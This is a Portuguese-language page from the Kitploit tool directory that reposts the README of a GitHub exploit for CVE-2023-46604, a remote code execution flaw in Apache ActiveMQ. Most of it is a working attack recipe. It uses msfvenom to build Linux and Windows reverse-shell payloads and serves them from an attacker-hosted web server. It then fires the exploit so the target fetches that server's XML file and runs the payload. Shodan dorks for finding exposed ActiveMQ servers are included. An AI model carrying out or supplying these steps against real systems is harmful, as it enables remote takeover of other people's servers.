Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ — Alcançando um Exploit de Reverse Shell para Apache ActiveMQ (CVE_2023-46604) | Kitploit
Ferramentas/GitHubGitHub/saumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubsaumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Alcançando um Exploit de Reverse Shell para Apache ActiveMQ (CVE_2023-46604)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
12640há 2 anosRevisado pelo Kitploit

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Este exploit se baseia no trabalho fundamental disponível em https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). Desenvolvemos ainda mais a técnica para obter uma reverse shell utilizando o Metasploit Framework (https://github.com/rapid7/metasploit-framework).

Uso:

Importante: Altere manualmente o endereço IP (0.0.0.0 na linha 11) nos arquivos XML para o endereço IP onde o payload será gerado. Se você seguir os comandos abaixo, será o seu endereço IP do Listener. Além disso, {IP_Of_Hosted_XML_File} será o seu endereço IP do Listener.

Para alvos Linux/Unix

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

Para alvos Windows

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

image

Shodan Dork:

  • product:"ActiveMQ OpenWire Transport"
  • image
  • product:"ActiveMQ OpenWire Transport" port:61616
  • image

Trabalho Original:

  • https://github.com/X1r0z/ActiveMQ-RCE

Para Mais Leitura:

  • https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
  • https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
  • https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

Um agradecimento especial a https://github.com/Anon4mous por me apoiar ativamente.

Baixar ferramenta